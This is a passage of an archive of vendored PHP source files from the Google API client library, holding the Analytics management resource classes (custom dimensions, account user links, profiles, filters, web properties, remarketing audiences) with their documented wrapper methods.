'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], CustomDimension::class); } /** * Lists custom dimensions to which the user has access. * (customDimensions.listManagementCustomDimensions) * * @param string $accountId Account ID for the custom dimensions to retrieve. * @param string $webPropertyId Web property ID for the custom dimensions to * retrieve. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of custom dimensions to include * in this response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return CustomDimensions */ public function listManagementCustomDimensions($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], CustomDimensions::class); } /** * Updates an existing custom dimension. This method supports patch semantics. * (customDimensions.patch) * * @param string $accountId Account ID for the custom dimension to update. * @param string $webPropertyId Web property ID for the custom dimension to * update. * @param string $customDimensionId Custom dimension ID for the custom dimension * to update. * @param CustomDimension $postBody * @param array $optParams Optional parameters. * * @opt_param bool ignoreCustomDataSourceLinks Force the update and ignore any * warnings related to the custom dimension being linked to a custom data source * / data set. * @return CustomDimension */ public function patch($accountId, $webPropertyId, $customDimensionId, CustomDimension $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDimensionId' => $customDimensionId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], CustomDimension::class); } /** * Updates an existing custom dimension. (customDimensions.update) * * @param string $accountId Account ID for the custom dimension to update. * @param string $webPropertyId Web property ID for the custom dimension to * update. * @param string $customDimensionId Custom dimension ID for the custom dimension * to update. * @param CustomDimension $postBody * @param array $optParams Optional parameters. * * @opt_param bool ignoreCustomDataSourceLinks Force the update and ignore any * warnings related to the custom dimension being linked to a custom data source * / data set. * @return CustomDimension */ public function update($accountId, $webPropertyId, $customDimensionId, CustomDimension $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDimensionId' => $customDimensionId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], CustomDimension::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementCustomDimensions::class, 'Google_Service_Analytics_Resource_ManagementCustomDimensions'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementAccountUserLinks.php000064400000007272147600400120027402 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $accountUserLinks = $analyticsService->management_accountUserLinks; * */ class ManagementAccountUserLinks extends \Google\Service\Resource { /** * Removes a user from the given account. (accountUserLinks.delete) * * @param string $accountId Account ID to delete the user link for. * @param string $linkId Link ID to delete the user link for. * @param array $optParams Optional parameters. */ public function delete($accountId, $linkId, $optParams = []) { $params = ['accountId' => $accountId, 'linkId' => $linkId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Adds a new user to the given account. (accountUserLinks.insert) * * @param string $accountId Account ID to create the user link for. * @param EntityUserLink $postBody * @param array $optParams Optional parameters. * @return EntityUserLink */ public function insert($accountId, EntityUserLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], EntityUserLink::class); } /** * Lists account-user links for a given account. * (accountUserLinks.listManagementAccountUserLinks) * * @param string $accountId Account ID to retrieve the user links for. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of account-user links to * include in this response. * @opt_param int start-index An index of the first account-user link to * retrieve. Use this parameter as a pagination mechanism along with the max- * results parameter. * @return EntityUserLinks */ public function listManagementAccountUserLinks($accountId, $optParams = []) { $params = ['accountId' => $accountId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], EntityUserLinks::class); } /** * Updates permissions for an existing user on the given account. * (accountUserLinks.update) * * @param string $accountId Account ID to update the account-user link for. * @param string $linkId Link ID to update the account-user link for. * @param EntityUserLink $postBody * @param array $optParams Optional parameters. * @return EntityUserLink */ public function update($accountId, $linkId, EntityUserLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'linkId' => $linkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], EntityUserLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementAccountUserLinks::class, 'Google_Service_Analytics_Resource_ManagementAccountUserLinks'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/Provisioning.php000064400000004132147600400120024627 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $provisioning = $analyticsService->provisioning; * */ class Provisioning extends \Google\Service\Resource { /** * Creates an account ticket. (provisioning.createAccountTicket) * * @param AccountTicket $postBody * @param array $optParams Optional parameters. * @return AccountTicket */ public function createAccountTicket(AccountTicket $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('createAccountTicket', [$params], AccountTicket::class); } /** * Provision account. (provisioning.createAccountTree) * * @param AccountTreeRequest $postBody * @param array $optParams Optional parameters. * @return AccountTreeResponse */ public function createAccountTree(AccountTreeRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('createAccountTree', [$params], AccountTreeResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Provisioning::class, 'Google_Service_Analytics_Resource_Provisioning'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementProfiles.php000064400000013402147600400120025721 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $profiles = $analyticsService->management_profiles; * */ class ManagementProfiles extends \Google\Service\Resource { /** * Deletes a view (profile). (profiles.delete) * * @param string $accountId Account ID to delete the view (profile) for. * @param string $webPropertyId Web property ID to delete the view (profile) * for. * @param string $profileId ID of the view (profile) to be deleted. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a view (profile) to which the user has access. (profiles.get) * * @param string $accountId Account ID to retrieve the view (profile) for. * @param string $webPropertyId Web property ID to retrieve the view (profile) * for. * @param string $profileId View (Profile) ID to retrieve the view (profile) * for. * @param array $optParams Optional parameters. * @return Profile */ public function get($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Profile::class); } /** * Create a new view (profile). (profiles.insert) * * @param string $accountId Account ID to create the view (profile) for. * @param string $webPropertyId Web property ID to create the view (profile) * for. * @param Profile $postBody * @param array $optParams Optional parameters. * @return Profile */ public function insert($accountId, $webPropertyId, Profile $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], Profile::class); } /** * Lists views (profiles) to which the user has access. * (profiles.listManagementProfiles) * * @param string $accountId Account ID for the view (profiles) to retrieve. Can * either be a specific account ID or '~all', which refers to all the accounts * to which the user has access. * @param string $webPropertyId Web property ID for the views (profiles) to * retrieve. Can either be a specific web property ID or '~all', which refers to * all the web properties to which the user has access. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of views (profiles) to include * in this response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return Profiles */ public function listManagementProfiles($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Profiles::class); } /** * Updates an existing view (profile). This method supports patch semantics. * (profiles.patch) * * @param string $accountId Account ID to which the view (profile) belongs * @param string $webPropertyId Web property ID to which the view (profile) * belongs * @param string $profileId ID of the view (profile) to be updated. * @param Profile $postBody * @param array $optParams Optional parameters. * @return Profile */ public function patch($accountId, $webPropertyId, $profileId, Profile $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], Profile::class); } /** * Updates an existing view (profile). (profiles.update) * * @param string $accountId Account ID to which the view (profile) belongs * @param string $webPropertyId Web property ID to which the view (profile) * belongs * @param string $profileId ID of the view (profile) to be updated. * @param Profile $postBody * @param array $optParams Optional parameters. * @return Profile */ public function update($accountId, $webPropertyId, $profileId, Profile $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], Profile::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementProfiles::class, 'Google_Service_Analytics_Resource_ManagementProfiles'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/Metadata.php000064400000002036147600400120023662 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $metadata = $analyticsService->metadata; * */ class Metadata extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Metadata::class, 'Google_Service_Analytics_Resource_Metadata'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/Management.php000064400000002052147600400120024214 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $management = $analyticsService->management; * */ class Management extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Management::class, 'Google_Service_Analytics_Resource_Management'); vendor/google/apiclient-services/src/Analytics/Resource/UserDeletionUserDeletionRequest.php000064400000003222147600400120030357 0ustar00google-api * $analyticsService = new Google\Service\Analytics(...); * $userDeletionRequest = $analyticsService->userDeletion_userDeletionRequest; * */ class UserDeletionUserDeletionRequest extends \Google\Service\Resource { /** * Insert or update a user deletion requests. (userDeletionRequest.upsert) * * @param UserDeletionRequest $postBody * @param array $optParams Optional parameters. * @return UserDeletionRequest */ public function upsert(UserDeletionRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('upsert', [$params], UserDeletionRequest::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserDeletionUserDeletionRequest::class, 'Google_Service_Analytics_Resource_UserDeletionUserDeletionRequest'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/DataGa.php000064400000006327147600400120023272 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $ga = $analyticsService->data_ga; * */ class DataGa extends \Google\Service\Resource { /** * Returns Analytics data for a view (profile). (ga.get) * * @param string $ids Unique table ID for retrieving Analytics data. Table ID is * of the form ga:XXXX, where XXXX is the Analytics view (profile) ID. * @param string $startDate Start date for fetching Analytics data. Requests can * specify a start date formatted as YYYY-MM-DD, or as a relative date (e.g., * today, yesterday, or 7daysAgo). The default value is 7daysAgo. * @param string $endDate End date for fetching Analytics data. Request can * should specify an end date formatted as YYYY-MM-DD, or as a relative date * (e.g., today, yesterday, or 7daysAgo). The default value is yesterday. * @param string $metrics A comma-separated list of Analytics metrics. E.g., * 'ga:sessions,ga:pageviews'. At least one metric must be specified. * @param array $optParams Optional parameters. * * @opt_param string dimensions A comma-separated list of Analytics dimensions. * E.g., 'ga:browser,ga:city'. * @opt_param string filters A comma-separated list of dimension or metric * filters to be applied to Analytics data. * @opt_param bool include-empty-rows The response will include empty rows if * this parameter is set to true, the default is true * @opt_param int max-results The maximum number of entries to include in this * feed. * @opt_param string output The selected format for the response. Default format * is JSON. * @opt_param string samplingLevel The desired sampling level. * @opt_param string segment An Analytics segment to be applied to data. * @opt_param string sort A comma-separated list of dimensions or metrics that * determine the sort order for Analytics data. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return GaData */ public function get($ids, $startDate, $endDate, $metrics, $optParams = []) { $params = ['ids' => $ids, 'start-date' => $startDate, 'end-date' => $endDate, 'metrics' => $metrics]; $params = array_merge($params, $optParams); return $this->call('get', [$params], GaData::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DataGa::class, 'Google_Service_Analytics_Resource_DataGa'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementFilters.php000064400000010773147600400120025556 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $filters = $analyticsService->management_filters; * */ class ManagementFilters extends \Google\Service\Resource { /** * Delete a filter. (filters.delete) * * @param string $accountId Account ID to delete the filter for. * @param string $filterId ID of the filter to be deleted. * @param array $optParams Optional parameters. * @return Filter */ public function delete($accountId, $filterId, $optParams = []) { $params = ['accountId' => $accountId, 'filterId' => $filterId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params], Filter::class); } /** * Returns filters to which the user has access. (filters.get) * * @param string $accountId Account ID to retrieve filters for. * @param string $filterId Filter ID to retrieve filters for. * @param array $optParams Optional parameters. * @return Filter */ public function get($accountId, $filterId, $optParams = []) { $params = ['accountId' => $accountId, 'filterId' => $filterId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Filter::class); } /** * Create a new filter. (filters.insert) * * @param string $accountId Account ID to create filter for. * @param Filter $postBody * @param array $optParams Optional parameters. * @return Filter */ public function insert($accountId, Filter $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], Filter::class); } /** * Lists all filters for an account (filters.listManagementFilters) * * @param string $accountId Account ID to retrieve filters for. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of filters to include in this * response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return Filters */ public function listManagementFilters($accountId, $optParams = []) { $params = ['accountId' => $accountId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Filters::class); } /** * Updates an existing filter. This method supports patch semantics. * (filters.patch) * * @param string $accountId Account ID to which the filter belongs. * @param string $filterId ID of the filter to be updated. * @param Filter $postBody * @param array $optParams Optional parameters. * @return Filter */ public function patch($accountId, $filterId, Filter $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'filterId' => $filterId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], Filter::class); } /** * Updates an existing filter. (filters.update) * * @param string $accountId Account ID to which the filter belongs. * @param string $filterId ID of the filter to be updated. * @param Filter $postBody * @param array $optParams Optional parameters. * @return Filter */ public function update($accountId, $filterId, Filter $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'filterId' => $filterId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], Filter::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementFilters::class, 'Google_Service_Analytics_Resource_ManagementFilters'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementAccounts.php000064400000003363147600400120025722 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $accounts = $analyticsService->management_accounts; * */ class ManagementAccounts extends \Google\Service\Resource { /** * Lists all accounts to which the user has access. * (accounts.listManagementAccounts) * * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of accounts to include in this * response. * @opt_param int start-index An index of the first account to retrieve. Use * this parameter as a pagination mechanism along with the max-results * parameter. * @return Accounts */ public function listManagementAccounts($optParams = []) { $params = []; $params = array_merge($params, $optParams); return $this->call('list', [$params], Accounts::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementAccounts::class, 'Google_Service_Analytics_Resource_ManagementAccounts'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementProfileFilterLinks.php000064400000015234147600400120027712 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $profileFilterLinks = $analyticsService->management_profileFilterLinks; * */ class ManagementProfileFilterLinks extends \Google\Service\Resource { /** * Delete a profile filter link. (profileFilterLinks.delete) * * @param string $accountId Account ID to which the profile filter link belongs. * @param string $webPropertyId Web property Id to which the profile filter link * belongs. * @param string $profileId Profile ID to which the filter link belongs. * @param string $linkId ID of the profile filter link to delete. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $profileId, $linkId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'linkId' => $linkId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Returns a single profile filter link. (profileFilterLinks.get) * * @param string $accountId Account ID to retrieve profile filter link for. * @param string $webPropertyId Web property Id to retrieve profile filter link * for. * @param string $profileId Profile ID to retrieve filter link for. * @param string $linkId ID of the profile filter link. * @param array $optParams Optional parameters. * @return ProfileFilterLink */ public function get($accountId, $webPropertyId, $profileId, $linkId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'linkId' => $linkId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], ProfileFilterLink::class); } /** * Create a new profile filter link. (profileFilterLinks.insert) * * @param string $accountId Account ID to create profile filter link for. * @param string $webPropertyId Web property Id to create profile filter link * for. * @param string $profileId Profile ID to create filter link for. * @param ProfileFilterLink $postBody * @param array $optParams Optional parameters. * @return ProfileFilterLink */ public function insert($accountId, $webPropertyId, $profileId, ProfileFilterLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], ProfileFilterLink::class); } /** * Lists all profile filter links for a profile. * (profileFilterLinks.listManagementProfileFilterLinks) * * @param string $accountId Account ID to retrieve profile filter links for. * @param string $webPropertyId Web property Id for profile filter links for. * Can either be a specific web property ID or '~all', which refers to all the * web properties that user has access to. * @param string $profileId Profile ID to retrieve filter links for. Can either * be a specific profile ID or '~all', which refers to all the profiles that * user has access to. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of profile filter links to * include in this response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return ProfileFilterLinks */ public function listManagementProfileFilterLinks($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], ProfileFilterLinks::class); } /** * Update an existing profile filter link. This method supports patch semantics. * (profileFilterLinks.patch) * * @param string $accountId Account ID to which profile filter link belongs. * @param string $webPropertyId Web property Id to which profile filter link * belongs * @param string $profileId Profile ID to which filter link belongs * @param string $linkId ID of the profile filter link to be updated. * @param ProfileFilterLink $postBody * @param array $optParams Optional parameters. * @return ProfileFilterLink */ public function patch($accountId, $webPropertyId, $profileId, $linkId, ProfileFilterLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'linkId' => $linkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], ProfileFilterLink::class); } /** * Update an existing profile filter link. (profileFilterLinks.update) * * @param string $accountId Account ID to which profile filter link belongs. * @param string $webPropertyId Web property Id to which profile filter link * belongs * @param string $profileId Profile ID to which filter link belongs * @param string $linkId ID of the profile filter link to be updated. * @param ProfileFilterLink $postBody * @param array $optParams Optional parameters. * @return ProfileFilterLink */ public function update($accountId, $webPropertyId, $profileId, $linkId, ProfileFilterLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'linkId' => $linkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], ProfileFilterLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementProfileFilterLinks::class, 'Google_Service_Analytics_Resource_ManagementProfileFilterLinks'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementClientId.php000064400000003165147600400120025636 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $clientId = $analyticsService->management_clientId; * */ class ManagementClientId extends \Google\Service\Resource { /** * Hashes the given Client ID. (clientId.hashClientId) * * @param HashClientIdRequest $postBody * @param array $optParams Optional parameters. * @return HashClientIdResponse */ public function hashClientId(HashClientIdRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('hashClientId', [$params], HashClientIdResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementClientId::class, 'Google_Service_Analytics_Resource_ManagementClientId'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementCustomDataSources.php000064400000004215147600400120027550 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $customDataSources = $analyticsService->management_customDataSources; * */ class ManagementCustomDataSources extends \Google\Service\Resource { /** * List custom data sources to which the user has access. * (customDataSources.listManagementCustomDataSources) * * @param string $accountId Account Id for the custom data sources to retrieve. * @param string $webPropertyId Web property Id for the custom data sources to * retrieve. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of custom data sources to * include in this response. * @opt_param int start-index A 1-based index of the first custom data source to * retrieve. Use this parameter as a pagination mechanism along with the max- * results parameter. * @return CustomDataSources */ public function listManagementCustomDataSources($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], CustomDataSources::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementCustomDataSources::class, 'Google_Service_Analytics_Resource_ManagementCustomDataSources'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementSegments.php000064400000003357147600400120025733 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $segments = $analyticsService->management_segments; * */ class ManagementSegments extends \Google\Service\Resource { /** * Lists segments to which the user has access. * (segments.listManagementSegments) * * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of segments to include in this * response. * @opt_param int start-index An index of the first segment to retrieve. Use * this parameter as a pagination mechanism along with the max-results * parameter. * @return Segments */ public function listManagementSegments($optParams = []) { $params = []; $params = array_merge($params, $optParams); return $this->call('list', [$params], Segments::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementSegments::class, 'Google_Service_Analytics_Resource_ManagementSegments'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/DataMcf.php000064400000005772147600400120023453 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $mcf = $analyticsService->data_mcf; * */ class DataMcf extends \Google\Service\Resource { /** * Returns Analytics Multi-Channel Funnels data for a view (profile). (mcf.get) * * @param string $ids Unique table ID for retrieving Analytics data. Table ID is * of the form ga:XXXX, where XXXX is the Analytics view (profile) ID. * @param string $startDate Start date for fetching Analytics data. Requests can * specify a start date formatted as YYYY-MM-DD, or as a relative date (e.g., * today, yesterday, or 7daysAgo). The default value is 7daysAgo. * @param string $endDate End date for fetching Analytics data. Requests can * specify a start date formatted as YYYY-MM-DD, or as a relative date (e.g., * today, yesterday, or 7daysAgo). The default value is 7daysAgo. * @param string $metrics A comma-separated list of Multi-Channel Funnels * metrics. E.g., 'mcf:totalConversions,mcf:totalConversionValue'. At least one * metric must be specified. * @param array $optParams Optional parameters. * * @opt_param string dimensions A comma-separated list of Multi-Channel Funnels * dimensions. E.g., 'mcf:source,mcf:medium'. * @opt_param string filters A comma-separated list of dimension or metric * filters to be applied to the Analytics data. * @opt_param int max-results The maximum number of entries to include in this * feed. * @opt_param string samplingLevel The desired sampling level. * @opt_param string sort A comma-separated list of dimensions or metrics that * determine the sort order for the Analytics data. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return McfData */ public function get($ids, $startDate, $endDate, $metrics, $optParams = []) { $params = ['ids' => $ids, 'start-date' => $startDate, 'end-date' => $endDate, 'metrics' => $metrics]; $params = array_merge($params, $optParams); return $this->call('get', [$params], McfData::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DataMcf::class, 'Google_Service_Analytics_Resource_DataMcf'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/DataRealtime.php000064400000004327147600400120024503 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $realtime = $analyticsService->data_realtime; * */ class DataRealtime extends \Google\Service\Resource { /** * Returns real time data for a view (profile). (realtime.get) * * @param string $ids Unique table ID for retrieving real time data. Table ID is * of the form ga:XXXX, where XXXX is the Analytics view (profile) ID. * @param string $metrics A comma-separated list of real time metrics. E.g., * 'rt:activeUsers'. At least one metric must be specified. * @param array $optParams Optional parameters. * * @opt_param string dimensions A comma-separated list of real time dimensions. * E.g., 'rt:medium,rt:city'. * @opt_param string filters A comma-separated list of dimension or metric * filters to be applied to real time data. * @opt_param int max-results The maximum number of entries to include in this * feed. * @opt_param string sort A comma-separated list of dimensions or metrics that * determine the sort order for real time data. * @return RealtimeData */ public function get($ids, $metrics, $optParams = []) { $params = ['ids' => $ids, 'metrics' => $metrics]; $params = array_merge($params, $optParams); return $this->call('get', [$params], RealtimeData::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DataRealtime::class, 'Google_Service_Analytics_Resource_DataRealtime'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementWebproperties.php000064400000011057147600400120026774 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $webproperties = $analyticsService->management_webproperties; * */ class ManagementWebproperties extends \Google\Service\Resource { /** * Gets a web property to which the user has access. (webproperties.get) * * @param string $accountId Account ID to retrieve the web property for. * @param string $webPropertyId ID to retrieve the web property for. * @param array $optParams Optional parameters. * @return Webproperty */ public function get($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Webproperty::class); } /** * Create a new property if the account has fewer than 20 properties. Web * properties are visible in the Google Analytics interface only if they have at * least one profile. (webproperties.insert) * * @param string $accountId Account ID to create the web property for. * @param Webproperty $postBody * @param array $optParams Optional parameters. * @return Webproperty */ public function insert($accountId, Webproperty $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], Webproperty::class); } /** * Lists web properties to which the user has access. * (webproperties.listManagementWebproperties) * * @param string $accountId Account ID to retrieve web properties for. Can * either be a specific account ID or '~all', which refers to all the accounts * that user has access to. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of web properties to include in * this response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return Webproperties */ public function listManagementWebproperties($accountId, $optParams = []) { $params = ['accountId' => $accountId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Webproperties::class); } /** * Updates an existing web property. This method supports patch semantics. * (webproperties.patch) * * @param string $accountId Account ID to which the web property belongs * @param string $webPropertyId Web property ID * @param Webproperty $postBody * @param array $optParams Optional parameters. * @return Webproperty */ public function patch($accountId, $webPropertyId, Webproperty $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], Webproperty::class); } /** * Updates an existing web property. (webproperties.update) * * @param string $accountId Account ID to which the web property belongs * @param string $webPropertyId Web property ID * @param Webproperty $postBody * @param array $optParams Optional parameters. * @return Webproperty */ public function update($accountId, $webPropertyId, Webproperty $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], Webproperty::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementWebproperties::class, 'Google_Service_Analytics_Resource_ManagementWebproperties'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementRemarketingAudience.php000064400000014455147600400120030055 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $remarketingAudience = $analyticsService->management_remarketingAudience; * */ class ManagementRemarketingAudience extends \Google\Service\Resource { /** * Delete a remarketing audience. (remarketingAudience.delete) * * @param string $accountId Account ID to which the remarketing audience * belongs. * @param string $webPropertyId Web property ID to which the remarketing * audience belongs. * @param string $remarketingAudienceId The ID of the remarketing audience to * delete. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $remarketingAudienceId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'remarketingAudienceId' => $remarketingAudienceId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Gets a remarketing audience to which the user has access. * (remarketingAudience.get) * * @param string $accountId The account ID of the remarketing audience to * retrieve. * @param string $webPropertyId The web property ID of the remarketing audience * to retrieve. * @param string $remarketingAudienceId The ID of the remarketing audience to * retrieve. * @param array $optParams Optional parameters. * @return RemarketingAudience */ public function get($accountId, $webPropertyId, $remarketingAudienceId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'remarketingAudienceId' => $remarketingAudienceId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], RemarketingAudience::class); } /** * Creates a new remarketing audience. (remarketingAudience.insert) * * @param string $accountId The account ID for which to create the remarketing * audience. * @param string $webPropertyId Web property ID for which to create the * remarketing audience. * @param RemarketingAudience $postBody * @param array $optParams Optional parameters. * @return RemarketingAudience */ public function insert($accountId, $webPropertyId, RemarketingAudience $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], RemarketingAudience::class); } /** * Lists remarketing audiences to which the user has access. * (remarketingAudience.listManagementRemarketingAudience) * * @param string $accountId The account ID of the remarketing audiences to * retrieve. * @param string $webPropertyId The web property ID of the remarketing audiences * to retrieve. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of remarketing audiences to * include in this response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * 